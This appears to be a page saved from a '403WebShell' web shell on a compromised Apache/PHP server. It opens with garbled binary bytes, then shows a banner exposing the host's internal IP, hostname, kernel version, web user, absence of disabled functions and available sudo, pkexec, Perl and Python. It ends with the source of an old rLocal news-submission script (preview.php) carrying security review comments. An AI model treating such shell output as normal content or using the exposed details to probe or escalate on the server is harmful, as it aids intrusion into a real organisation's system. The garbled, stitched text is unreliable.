h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rlocal/


Current File : /var/www/html/rlocal/preview.php
<?
/*=========================================================================

:: rLocal -- web local database
:: Copyright (C) 2001 Thana Charuphanthuset
:: see http://www.OhioNet.cjb.net for more

=*=======================================================================*/

include("include/common.inc.php");
include("include/commonfile.inc.php");

/* Debug hook: the constant-false condition keeps the POST dump switched off. */
if (0) {
	F_debug($HTTP_POST_VARS);
}

/*
 * Choose the summary text in $summ:
 *   - a submitted summary is used as-is;
 *   - otherwise, with SummaryLength set to 0, the whole story body is used;
 *   - otherwise F_genSummary() derives one from the story body.
 */
if (!empty($Summary)) {
	$summ	= $Summary;
} elseif ($CONF["SummaryLength"]==0) {
	$summ	= $Content;
} else {
	$summ	= F_genSummary($Content);
}

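/*
 * Submit path: insert the previewed story, its optional picture/file
 * attachment rows and its off-site links, then redirect to stories.php.
 *
 * The request variables read here ($Heading, $Content, $Topic, $Links, ...)
 * are not assigned in this file, so every one of them is treated as
 * untrusted input before it reaches a SQL string.
 *
 * Escaping uses addslashes(), matching the rest of this script. It is not
 * charset-aware; parameterised queries (mysqli/PDO) are the durable fix but
 * need a different connection handle than the ext/mysql link in $db.
 */
if ($mode==_SUBMIT) {

	$msg	= urlencode(_STORYOK);
	$rid	= F_getRid();
	if ($save=="on") {
		F_saveUser($Author,$AuthorEmail,$AuthorURL);
	}
	/* Verified flag: 'Y' when moderation is off or the poster is an admin, otherwise 'N'. */
	if ($CONF["Moderation"]==0 || F_isAdmin()) {
		$valflag	= "'Y',";
	} else {
		$valflag	= "'N',";
	}
	/* Run Kad */
	/*
	 * Allocate an attachment id only when an upload variable is set.
	 * `none` is written as a bare constant name; unless such a constant is
	 * defined elsewhere, PHP 5 falls back to the string 'none' with a notice.
	 * NOTE(review): F_getPicStoryfile()/F_getFileStoryfile() below receive the
	 * client-supplied upload name and are defined outside this file - confirm
	 * they restrict file types and never leave executable files under the
	 * document root.
	 */
	$NULL_ID = "0";
	if ((!empty($picStoryURL)) && $picStoryURL != none){
		$gsid = F_getPicFileStoryID();
	} else {
		$gsid = "NULL";
	}
	if ((!empty($fileStoryURL)) && $fileStoryURL != none){
		$fsid = F_getPicFileStoryID();
	} else {
		$fsid = "NULL";
	}
	/* End Kad */
	
	$sql	= "INSERT INTO T_Stories ";
	$sql	.= "(Rid,Verified,Topic,Heading,KeyWords,Summary,Content,Host,Author,AuthorEmail,AuthorURL,PicStorieID,FileStorieID,EmailComments,Hits,Birthstamp,Repostamp) ";
	$sql	.= "VALUES (";
	$sql	.= "'" . $rid . "',";
	$sql	.= $valflag;
	/*
	 * Topic is written into the statement unquoted, so it must be forced to a
	 * number; the raw request value could otherwise rewrite the query.
	 * Assumes topic ids are integers - TODO confirm against the T_Stories schema.
	 */
	$sql	.= $CONF["Topics"]>0 ? (int)$Topic : 0;
	$sql	.= ",'" . htmlspecialchars(addslashes($Heading)) . "',";
	$sql	.= "'" . addslashes($KeyWords) . "',";
	$sql	.= "'" . addslashes($summ) . "',";
	$sql	.= "'" . addslashes($Content) . "',";
	/*
	 * F_getIP() is defined elsewhere; if it can return a client-supplied
	 * header value, that value must not reach the query unescaped. Escaping
	 * leaves a well-formed address unchanged.
	 */
	$sql	.= "'" . addslashes(F_getIP()) . "',";
	$sql	.= "'" . strip_tags(addslashes($Author)) . "',";
	$sql	.= "'" . addslashes($AuthorEmail) . "',";
	$sql	.= "'" . addslashes($AuthorURL) . "',";
	if ($gsid != "NULL"){
		$sql	.= "'" . $gsid . "',";
	}else{
		$sql    .= "'" . $NULL_ID . "',";
	}	
	if ($fsid != "NULL"){
		$sql	.= "'" . $fsid . "',";
	}else{
		$sql    .= "'" . $NULL_ID . "',";
	}
	$sql	.= $EmailComments=="on" ? "1," : "0,";
	$sql	.= "1,";
	$sql	.= "now(),";
	$sql	.= "now()";
	$sql	.= ")";
	$RET	= @mysql_query($sql,$db);

	/* Run Kad */
	/* Attachment rows are written only after the story insert succeeded. */
	if ((!($RET<1)) && ($gsid != "NULL")) {
		$gpsf   = F_getPicStoryfile($gsid,$picStoryURL,$picStoryURL_name);
		$sql0   = "INSERT INTO T_PicStorie ";
		$sql0   .= "(PicStorieID,ImgURL,AltTag,Timestamp) ";
		$sql0   .= "VALUES (";
		$sql0   .= "'" . $gsid . "',";
		$sql0   .= "'" . addslashes($gpsf) . "',";
		$sql0   .= "'" . htmlspecialchars(addslashes($Heading)) . "',";
		$sql0   .= "now()";
		$sql0   .= ")";
		$RET    = @mysql_query($sql0,$db);
	} 
	if ((!($RET<1)) && ($fsid != "NULL")) {
		$gfsf   = F_getFileStoryfile($fsid,$fileStoryURL,$fileStoryURL_name);
		$sql1   = "INSERT INTO T_FileStorie ";
		$sql1   .= "(FileStorieID,FileURL,AltTag,Timestamp) ";
		$sql1   .= "VALUES (";
		$sql1   .= "'" . $fsid . "',";
		$sql1   .= "'" . addslashes($gfsf) . "',";
		$sql1   .= "'" . htmlspecialchars(addslashes($Heading)) . "',";
		$sql1   .= "now()";
		$sql1   .= ")";
		$RET    = @mysql_query($sql1,$db);
	}
	/* End Kad */

	if ($RET<1) {
		F_error("Unable to insert story $rid");
	} else {

		if (!empty($Links)) {
			/*
			 * Link names (array keys) and URLs (array values) come from the
			 * request and were previously interpolated into the statement raw.
			 * They are escaped the same way as the story fields above.
			 * NOTE(review): if an include emulates magic quotes, these values
			 * would now be escaped twice like the other fields - confirm how
			 * the link display code unescapes them.
			 * The loop still stops at the first key PHP treats as false.
			 */
			for (reset($Links);$k=key($Links);next($Links)) {
				$sql	= "INSERT INTO T_IndexLinks ";
				$sql	.= "(ParentRid,Name,URL,Hits) ";
				$sql	.= "VALUES ('" . $rid . "','" . addslashes($k) . "','" . addslashes($Links[$k]) . "',0)";
				@mysql_query($sql,$db);
			}
		}
		if ($CONF["Backend"]>0) {
			export_rdf();
		}
		/* The mailing list is only notified for stories stored as verified. */
		if ($CONF["MailingList"]>0 && $valflag == "'Y',") {
			F_mailtoList($rid);
		}
		if ($CONF["Moderation"]==2) {
			F_notifyAdmin($Topic,$Heading,$Author,$AuthorEmail);
		}
		header("Location:$G_URL/stories.php?msg=$msg");
	}
	exit();
}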

include("include/header.inc.php");


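/*
 * Preview path: stamp the posted fields with the current time and the
 * address returned by F_getIP(), then render them as a story.
 * NOTE(review): F_drawStory() is defined elsewhere and receives the raw POST
 * array - confirm how it filters or escapes what it prints.
 */
$HTTP_POST_VARS["Birthstamp"] = date("Y-m-d H:i:s",time());
$HTTP_POST_VARS["Host"] = F_getIP();
F_drawStory($HTTP_POST_VARS);

/*
 * Start of the edit form shown under the preview.
 * Heading and KeyWords are echoed inside double-quoted value attributes.
 * strip_tags() does not remove quote characters, so the values are also
 * passed through htmlspecialchars(ENT_QUOTES) to keep them inside the
 * attribute. The browser decodes the entities again, so the text that is
 * resubmitted is unchanged.
 * htmlspecialchars() is called without an explicit charset, like the existing
 * call on the insert path, so it uses PHP's configured default - verify that
 * this matches the page encoding.
 */
$VAR["Heading"] = _PRESTORY;
$VAR["Content"] = _PRETEXT;
$VAR["Content"] .= "
<form
	action	= \"$G_URL/preview.php\"
	name	= \"Preview\"
	method	= post
	enctype = \"multipart/form-data\"
	onsubmit= \"return validatePreview()\">
<table	width	= 100%
	cellspacing	= 0
	cellpadding	= 3
	border	= 0>
<tr>
<td>" . _TITLE . ":</td>
<td><input	type	= text
	size	= 40
	maxlength=48
	name	= Heading
	value	= \"" . htmlspecialchars(strip_tags(stripslashes($Heading)), ENT_QUOTES) . "\"></td>
</tr>
<tr>
<td>" . _KEYWORDS . ":</td>
<td><input	type	= text
	size	= 40
	maxlength=100
	name	= KeyWords
	value	= \"" . htmlspecialchars(strip_tags(stripslashes($KeyWords)), ENT_QUOTES) . "\"></td>
</tr>";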

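/* Topic selector row, shown only when topics are enabled; the options come from F_topicsel(). */
if ($CONF["Topics"]>0) {
$VAR["Content"] .= "
	<tr>
	<td>" . _TOPIC . ":</td>
	<td>
	<select	name	= \"Topic\">";
$VAR["Content"] .= F_topicsel(0,"post");
$VAR["Content"] .= "
	</select>
	</tr>";
}

/*
 * Summary textarea, shown only when a summary length is configured.
 * The text is entity-encoded before it is placed between the textarea tags:
 * unencoded, a closing-tag sequence in the summary would end the textarea and
 * the remainder would be parsed as page markup, and existing entities would
 * be silently decoded on every preview round trip. The browser decodes the
 * entities for editing, so the resubmitted text is unchanged.
 * htmlspecialchars() uses PHP's configured default charset here - verify that
 * this matches the page encoding.
 */
if ($CONF["SummaryLength"]>0) {
$VAR["Content"] .= "
<tr>
<td	colspan	= 2>" . _SUMMARY . ":<br>
<textarea
	name	= Summary
	rows	= 5
	cols	= 80
	wrap	= physical>" . htmlspecialchars(stripslashes($summ), ENT_QUOTES) . "</textarea></td>
</tr>";
}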

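/*
 * Story body textarea plus the two file-upload inputs.
 * The story text is entity-encoded before it is placed between the textarea
 * tags so that markup inside it cannot close the textarea and be parsed as
 * part of the page; the browser decodes the entities for editing, so the
 * resubmitted text is unchanged.
 * htmlspecialchars() uses PHP's configured default charset here - verify that
 * this matches the page encoding.
 */
$VAR["Content"] .= "
<tr>
<td	colspan	= 2>" . _STORY . ":<br>
<textarea
	name	= Content
	rows	= 10
	cols	= 80
	wrap	= physical>" . htmlspecialchars(stripslashes($Content), ENT_QUOTES) . "</textarea></td>
</tr>

<tr>
<td>" . _PICSTORY . ":</td>
<td><input	type	= file
	size	= 40
	name	= picStoryURL></td>
</tr>

<tr>
<td>" . _FILESTORY . ":</td>
<td><input	type	= file
	size	= 40
	name	= fileStoryURL></td>
</tr>
";

/*== off-site link / external url ==*/
/*
 * NOTE(review): $Links comes from the request and F_editIndexes() is defined
 * elsewhere - confirm it encodes link names and URLs before emitting them.
 */
if (!empty($Links)) {
	$VAR["Content"] .= F_editIndexes($Links);
}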

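/*
 * Hidden fields that carry the author details and options through the
 * preview round trip, followed by the Submit/Preview buttons.
 * These request values were previously written into the value attributes
 * unencoded, so a quote character in any of them ended the attribute and the
 * rest was parsed as markup. They are now entity-encoded with ENT_QUOTES;
 * the browser decodes them again on submit, so the posted values are
 * unchanged.
 * htmlspecialchars() uses PHP's configured default charset here - verify that
 * this matches the page encoding.
 */
$VAR["Content"] .= "
<tr>
<td	colspan	= 2>
<input	type	= hidden
	name	= Author
	value	= \"" . htmlspecialchars($Author, ENT_QUOTES) . "\">
<input	type	= hidden
	name	= AuthorEmail
	value	= \"" . htmlspecialchars($AuthorEmail, ENT_QUOTES) . "\">
<input	type	= hidden
	name	= AuthorURL
	value	= \"" . htmlspecialchars($AuthorURL, ENT_QUOTES) . "\">
<input	type	= hidden
	name	= save
	value	= \"" . htmlspecialchars($save, ENT_QUOTES) . "\">
<input	type	= hidden
	name	= EmailComments
	value	= \"" . htmlspecialchars($EmailComments, ENT_QUOTES) . "\">
<input	type	= hidden
	name	= what
	value	= \"news\">
<input	type	= submit
	name	= mode
	value	= \"" . _SUBMIT . "\">
<input	type	= submit
	name	= mode
	value	= \"" . _PREVIEW . "\"></td>
</tr>
</table>
</form>";

/* Hand the assembled heading and form markup to the page layout helper. */
F_drawMain($VAR);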


include("include/footer.inc.php");
?>
